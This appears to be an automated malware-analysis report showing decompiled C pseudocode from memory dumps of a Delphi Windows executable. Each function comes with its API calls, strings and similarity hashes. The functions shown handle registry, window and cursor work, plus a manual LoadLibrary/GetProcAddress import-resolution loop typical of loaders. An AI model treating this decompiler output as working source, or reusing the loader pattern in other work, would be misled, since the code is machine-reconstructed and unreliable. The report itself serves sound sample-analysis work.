                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E00423CC4(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
                                                                                int _v8;
                                                                                char _v12;
                                                                                char _v16;
                                                                                void* __ebx;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                void* __ebp;
                                                                                long _t18;
                                                                                void* _t25;
                                                                                intOrPtr _t28;
                                                                                char _t33;

                                                                                _t32 = __ecx;
                                                                                _t33 = __edx;
                                                                                _t25 = __eax;
                                                                                _v8 = 0;
                                                                                _t18 = RegQueryValueExA( *(_t25 + 4), E00404C00(__edx), 0,  &_v8, __ecx,  &_a8); // executed
                                                                                if(_t18 != 0) {
                                                                                    _v16 = _t33;
                                                                                    _v12 = 0xb;
                                                                                    _t28 =  *0x462f48; // 0x4161b8
                                                                                    E0040C214(_t25, _t28, 1, _t32, _t33, 0,  &_v16);
                                                                                    E00404184();
                                                                                }
                                                                                *_a4 = E004238F0(_v8);
                                                                                return _a8;
                                                                            }


                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF
                                                                            Strings
                                                                            • 48B , xrefs: 00423D0D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: 48B
                                                                            • API String ID: 3660427363-1399719961
                                                                            • Opcode ID: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b
                                                                            • Instruction ID: a8e3a137c339f5fd24472462273deb51e711ff11fc4394b496541acd54afbdef
                                                                            • Opcode Fuzzy Hash: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b
                                                                            • Instruction Fuzzy Hash: 45012175B00208BBD700EF99DC81A9AB7BCDB59314F10817AFD14DB281DA759E0487A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
                                                                            E00423BD0(intOrPtr* __eax, signed int __ebx, char* __ecx, void* __edx, void* __fp0) {
                                                                                long _t16;
                                                                                intOrPtr* _t32;
                                                                                char* _t35;
                                                                                intOrPtr* _t37;

                                                                                _pop(_t37);
                                                                                *__eax =  *__eax + __eax;
                                                                                *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
                                                                                _push(__ebx);
                                                                                _push(__ecx);
                                                                                _t35 = __ecx;
                                                                                _t32 = __eax;
                                                                                E00403264(__ecx, 8);
                                                                                _t16 = RegQueryValueExA( *(_t32 + 4), E00404C00(__edx), 0, _t37 + 8, 0, _t35 + 4); // executed
                                                                                *_t35 = E004238F0( *_t37);
                                                                                return __ebx & 0xffffff00 | _t16 == 0x00000000;
                                                                            }


                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06
                                                                            Strings
                                                                            • MS Shell Dlg 2 , xrefs: 00423BD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: MS Shell Dlg 2
                                                                            • API String ID: 3660427363-3198668166
                                                                            • Opcode ID: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809
                                                                            • Instruction ID: 7c8ec6a0d6e2363a4a3569427e10175affe607f8ccc4c0b7cc53773ec14cf429
                                                                            • Opcode Fuzzy Hash: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809
                                                                            • Instruction Fuzzy Hash: FCF0826230D2446FD704EA6EAC41BAB7BDCDBC5310F05807FF948C7582DA24DD088369
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            E00423BD4(void* __eax, char* __ecx, void* __edx, void* __fp0) {
                                                                                long _t14;
                                                                                signed int _t18;
                                                                                void* _t26;
                                                                                char* _t27;
                                                                                intOrPtr* _t28;

                                                                                _push(__ecx);
                                                                                _t27 = __ecx;
                                                                                _t26 = __eax;
                                                                                E00403264(__ecx, 8);
                                                                                _t14 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0, _t28 + 8, 0, _t27 + 4); // executed
                                                                                *_t27 = E004238F0( *_t28);
                                                                                return _t18 & 0xffffff00 | _t14 == 0x00000000;
                                                                            }


                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06
                                                                            Strings
                                                                            • MS Shell Dlg 2 , xrefs: 00423BD5, 00423BD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: MS Shell Dlg 2
                                                                            • API String ID: 3660427363-3198668166
                                                                            • Opcode ID: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099
                                                                            • Instruction ID: 41461fa9fb353abdc0202eda5798ac71598ea82e96ed0a8436159ebd475baf22
                                                                            • Opcode Fuzzy Hash: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099
                                                                            • Instruction Fuzzy Hash: 92F030723092046BE704EA6EAD41FABA7DCDBC9355F11803EF948D7281DA24DD088365
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
E004605D0(void* __ecx, void* __edi, void* __esi) {
    intOrPtr _t6;
    intOrPtr _t8;
    intOrPtr _t10;
    intOrPtr _t12;
    intOrPtr _t14;
    void* _t16;
    void* _t17;
    intOrPtr _t20;
    intOrPtr _t21;
    intOrPtr _t22;
    intOrPtr _t23;
    intOrPtr _t28;

    _t25 = __esi;
    _t17 = __ecx;
    _push(_t28);
    _push(0x460656);
    _push( *[fs:eax]);
    *[fs:eax] = _t28;
    *0x4664fc =  *0x4664fc - 1;
    if( *0x4664fc < 0) {
        *0x4664f8 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
        _t31 =  *0x4664f8;
        E004478D4(_t16, __edi,  *0x4664f8);
        _t6 =  *0x4362e8; // 0x436334
        E0041A040(_t6, _t16, _t17,  *0x4664f8);
        _t8 =  *0x4362e8; // 0x436334
        E0041A0E0(_t8, _t16, _t17, _t31);
        _t21 =  *0x4362e8; // 0x436334
        _t10 =  *0x447f50; // 0x447f9c
        E0041A08C(_t10, _t16, _t21, __esi, _t31);
        _t22 =  *0x4362e8; // 0x436334
        _t12 =  *0x44958c; // 0x4495d8
        E0041A08C(_t12, _t16, _t22, __esi, _t31);
        _t23 =  *0x4362e8; // 0x436334
        _t14 =  *0x4496b0; // 0x4496fc
        E0041A08C(_t14, _t16, _t23, _t25, _t31);
    }
    _pop(_t20);
    *[fs:eax] = _t20;
    _push(0x46065d);
    return 0;
}

                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,00460656), ref: 004605EA
                                                                              • Part of subcall function 004478D4: GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5
                                                                              • Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447928
                                                                              • Part of subcall function 004478D4: GetCurrentThreadId.KERNEL32 ref: 00447943
                                                                              • Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447979
                                                                              • Part of subcall function 004478D4: RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F
                                                                              • Part of subcall function 004478D4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13
                                                                              • Part of subcall function 004478D4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24
                                                                            Strings
                                                                            • 4cC , xrefs: 00460604, 0046060E, 00460618, 00460628, 00460638
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                            • String ID: 4cC
                                                                            • API String ID: 3557136124-2099690512
                                                                            • Opcode ID: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803
                                                                            • Instruction ID: 025689f7684f9bed17e1c02e81f1f2566ccf6c41d45d360a3a3928fa787afd4c
                                                                            • Opcode Fuzzy Hash: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803
                                                                            • Instruction Fuzzy Hash: C5F0FF39244241AFD311FF26EC5291B3BA4E789314353857BE84043675DA3DECA1DB9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
E0045ED90(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
    intOrPtr _v8;
    intOrPtr _v12;
    char _v16;
    intOrPtr _t16;
    intOrPtr _t17;
    intOrPtr _t20;
    CHAR* _t26;
    struct HINSTANCE__* _t27;
    intOrPtr _t28;
    struct HINSTANCE__* _t35;
    intOrPtr _t38;
    CHAR* _t50;
    void* _t51;
    intOrPtr _t53;
    void* _t60;

    _push(__ebx);
    _v16 = 0;
    _v8 = __eax;
    _push(_t60);
    _push(0x45eed7);
    _push( *[fs:eax]);
    *[fs:eax] = _t60 + 0xfffffff4;
    0;
    *0x46666c = _v8;
    while(1) {
        _t16 =  *0x46666c; // 0x22880f0
        if( *((intOrPtr*)(_t16 + 0xc)) == 0) {
            break;
        }
        0;
        0;
        _t17 =  *0x46666c; // 0x22880f0
        _t4 = _t17 + 0xc; // 0x0
        *0x46667c =  *_t4 +  *0x466630;
        _push(0x466680);
        _t20 =  *0x46665c; // 0x0
        _v12 = _t20;
        _push(E004058B4());
        _t50 =  *0x46667c; // 0x2288ccc
        E00404934( &_v16, _t50);
        _pop(_t51);
        if(E0045ECA0(0x466670, _t51) == 0) {
            0;
            _t26 =  *0x46667c; // 0x2288ccc
            _t27 = LoadLibraryA(_t26); // executed
            *0x466668 = _t27;
        }
        _t28 =  *0x46666c; // 0x22880f0
        if( *((intOrPtr*)(_t28 + 4)) != 0) {
            0;
            0;
        } else {
            0;
            0;
            0;
            _t38 =  *0x46666c; // 0x22880f0
            _t10 = _t38 + 0x10; // 0x0
            *0x466670 =  *_t10 +  *0x466630;
        }
        while( *((intOrPtr*)( *0x466670)) != 0) {
            *0x466674 =  *((intOrPtr*)( *0x466670)) +  *0x466630 + 2;
            _t35 =  *0x466668; // 0x6f9f0000
            *0x466678 = GetProcAddress(_t35,  *0x466674);
            *((intOrPtr*)( *0x466670)) =  *0x466678;
            *0x466670 =  *0x466670 + 4;
        }
        *0x46666c =  *0x46666c + 0x14;
    }
    _pop(_t53);
    *[fs:eax] = _t53;
    _push(0x45eede);
    return E0040473C( &_v16);
}

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(02288CCC,00466680,00000000,0045EED7), ref: 0045EE31
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826
                                                                            • Instruction ID: 41749767bb47e492ca36cbe40e98458e297fbfc91c6430a84583a06b372d5935
                                                                            • Opcode Fuzzy Hash: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826
                                                                            • Instruction Fuzzy Hash: D8313AB0A01600EFCB04CF29F882E5677F4EB4A310B12857AE805D7361E379AD05CF5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00454794(void* __eax) {
    struct HICON__* _t5;
    void* _t7;
    void* _t8;
    struct HINSTANCE__* _t11;
    CHAR** _t12;
    void* _t13;

    _t13 = __eax;
    *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
    _t8 = 0xffffffea;
    _t12 = 0x46275c;
    do {
        if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
            if(_t8 != 0xffffffeb) {
                _t11 = 0;
            } else {
                goto L4;
            }
        } else {
            L4:
            _t11 =  *0x4657f8; // 0x400000
        }
        _t5 = LoadCursorA(_t11,  *_t12); // executed
        _t7 = E00454850(_t13, _t5, _t8);
        _t8 = _t8 + 1;
        _t12 =  &(_t12[1]);
    } while (_t8 != 0xffffffff);
    return _t7;
}

                                                                            APIs
                                                                            • LoadCursorA.USER32 ref: 004547A1
                                                                            • LoadCursorA.USER32 ref: 004547D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3238433803-0
                                                                            • Opcode ID: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a
                                                                            • Instruction ID: 5b92fd6cb82509c6b3023340ad8d3fa0ece0f32d952ca65a9c1d4e2f0fe40f81
                                                                            • Opcode Fuzzy Hash: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a
                                                                            • Instruction Fuzzy Hash: E3F08921B046441A9A20557E5CC0A7A72D4DBC773AF20033BFD39DF3D2D72D6C86415A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00423988(void* __eax) {
    void* _t7;
    void* _t14;

    _t14 = __eax;
    _t7 =  *(__eax + 4);
    if(_t7 != 0) {
        if( *((char*)(__eax + 0xc)) == 0) {
            RegFlushKey(_t7);
        }
        RegCloseKey( *(_t14 + 4)); // executed
        *(_t14 + 4) = 0;
        return E0040473C(_t14 + 0x10);
    }
    return _t7;
}

                                                                            APIs
                                                                            • RegFlushKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 00423999
                                                                            • RegCloseKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004239A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseFlush
                                                                            • String ID:
                                                                            • API String ID: 320916635-0
                                                                            • Opcode ID: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960
                                                                            • Instruction ID: 607071273b8a8f03ded242f4628478f4e142bd0fa1bf7c60492dcbfc477769d6
                                                                            • Opcode Fuzzy Hash: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960
                                                                            • Instruction Fuzzy Hash: 7CD012A17002008BCF50EF7AC5C47177BDC5B06315B44C4B7A809EF247D67CC4508B24
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
E00423A1A(void* __eax, void* __ebx, void* __edx, void* __esi) {
    char _v8;
    char _v9;
    void* _v16;
    char* _t61;
    signed int _t64;
    char* _t67;
    signed int _t70;
    char* _t73;
    signed int _t76;
    signed char _t96;
    intOrPtr _t109;
    void* _t118;
    void* _t121;

    _v8 = 0;
    _t118 = __eax;
    _push(_t121);
    _push(0x423bb6);
    _push( *[fs:eax]);
    *[fs:eax] = _t121 + 0xfffffff4;
    E004047D4( &_v8, __edx);
    _t96 = E004238DC(_v8);
    if(_t96 == 0) {
        E00404CA0( &_v8, 1, 1);
    }
    _v16 = 0;
    _t61 = E00404C00(_v8);
    _t64 = RegOpenKeyExA(E00423A08(_t118, _t96), _t61, 0, 0x20019,  &_v16); // executed
    _v9 = _t64 == 0;
    if(_v9 == 0) {
        _t67 = E00404C00(_v8);
        _t70 = RegOpenKeyExA(E00423A08(_t118, _t96), _t67, 0, 0x20009,  &_v16);
        _v9 = _t70 == 0;
        if(_v9 == 0) {
            _t73 = E00404C00(_v8);
            _t76 = RegOpenKeyExA(E00423A08(_t118, _t96), _t73, 0, 1,  &_v16);
            _v9 = _t76 == 0;
            if(_v9 != 0) {
                *(_t118 + 0x18) = 1;
                if(((_t76 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
                    _push( *((intOrPtr*)(_t118 + 0x10)));
                    _push(E00423BD0);
                    _push(_v8);
                    E00404AC0();
                }
                E004239E4(_t118, _v8, _v16);
            }
        } else {
            *(_t118 + 0x18) = 0x20009;
            if(((_t70 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
                _push( *((intOrPtr*)(_t118 + 0x10)));
                _push(E00423BD0);
                _push(_v8);
                E00404AC0();
            }
            E004239E4(_t118, _v8, _v16);
        }
    } else {
        *(_t118 + 0x18) = 0x20019;
        if(((_t64 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
            _push( *((intOrPtr*)(_t118 + 0x10)));
            _push(E00423BD0);
            _push(_v8);
            E00404AC0();
        }
        E004239E4(_t118, _v8, _v16);
    }
    _pop(_t109);
    *[fs:eax] = _t109;
    _push(E00423BBD);
    return E0040473C( &_v8);
}


                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134
                                                                            • Instruction ID: bbbba562cf4ef8ad2c766562c27961f1ed0d25de4a21f7584f0d3e043cf70339
                                                                            • Opcode Fuzzy Hash: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134
                                                                            • Instruction Fuzzy Hash: 8821C230B04218AFDB11DEA5E952B9EB7F99B44304F5044BBB904E3282DB7DAF049608
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
E0040730A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
    CHAR* _v8;
    void* _t13;
    struct HWND__* _t24;
    CHAR* _t31;
    long _t38;

    _push(_t31);
    _v8 = _t31;
    _t38 = __eax;
    _t13 = E00403018();
    _t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
    E00403008(_t13);
    return _t24;
}


                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 0040734B
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328
                                                                            • Instruction ID: b85b0cc3f2e5bc7e9d45a46899a2df812a80ae235cc29424d0f8592cef13ccd6
                                                                            • Opcode Fuzzy Hash: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328
                                                                            • Instruction Fuzzy Hash: 3FF074B2705118BF9B40DE9DDC81D9B7BECEB4D264B054169FA08E3201D635ED1087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0040730C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
    CHAR* _v8;
    void* _t13;
    struct HWND__* _t24;
    CHAR* _t29;
    long _t32;

    _v8 = _t29;
    _t32 = __eax;
    _t13 = E00403018();
    _t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
    E00403008(_t13);
    return _t24;
}


                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 0040734B
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2
                                                                            • Instruction ID: e61e4b7de7878b32b5720a0b5ecd670a84b3b3b45b0905eabb5fb271e5fc7604
                                                                            • Opcode Fuzzy Hash: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2
                                                                            • Instruction Fuzzy Hash: 52F097B2605118BF9B40DE9DDC81DDF7BECEB4D264B054169FA0CE3201D635ED1087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00407364(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
    long _v8;
    void* _t12;
    struct HWND__* _t22;
    long _t27;
    CHAR* _t30;

    _v8 = _t27;
    _t30 = __eax;
    _t12 = E00403018();
    _t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
    E00403008(_t12);
    return _t22;
}


                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 004073A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6
                                                                            • Instruction ID: 85808ded18d7c00b20e9529308029099665b44857ea87863c4fce7c96cc8d2ed
                                                                            • Opcode Fuzzy Hash: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6
                                                                            • Instruction Fuzzy Hash: A4F092B2605118BFDB80DE9EDC81E9B7BECEB4D265B00416AFA0CE7241D535ED1087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00405C1C(void* __eax) {
    char _v272;
    intOrPtr _t14;
    void* _t16;
    intOrPtr _t18;
    CHAR* _t19;

    _t16 = __eax;
    if(*((intOrPtr*)(__eax + 0x10)) == 0) {
        _t3 = _t16 + 4; // 0x400000
        GetModuleFileNameA(*_t3, &_v272, 0x105);
        _t14 = E00405E80(_t19); // executed
        _t18 = _t14;
        *((intOrPtr*)(_t16 + 0x10)) = _t18;
        if(_t18 == 0) {
            _t5 = _t16 + 4; // 0x400000
            *((intOrPtr*)(_t16 + 0x10)) = *_t5;
        }
    }
    _t7 = _t16 + 0x10; // 0x400000
    return *_t7;
}


                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405C3A
                                                                              • Part of subcall function 00405E80: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6
                                                                              • Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F
                                                                              • Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D
                                                                              • Part of subcall function 00405E80: RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                            • String ID:
                                                                            • API String ID: 2796650324-0
                                                                            • Opcode ID: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa
                                                                            • Instruction ID: 1b0a8c2aa0dbabf6a82ae7d2e2fcdd13184de0ac0e476d2ee2bc6056b14444b1
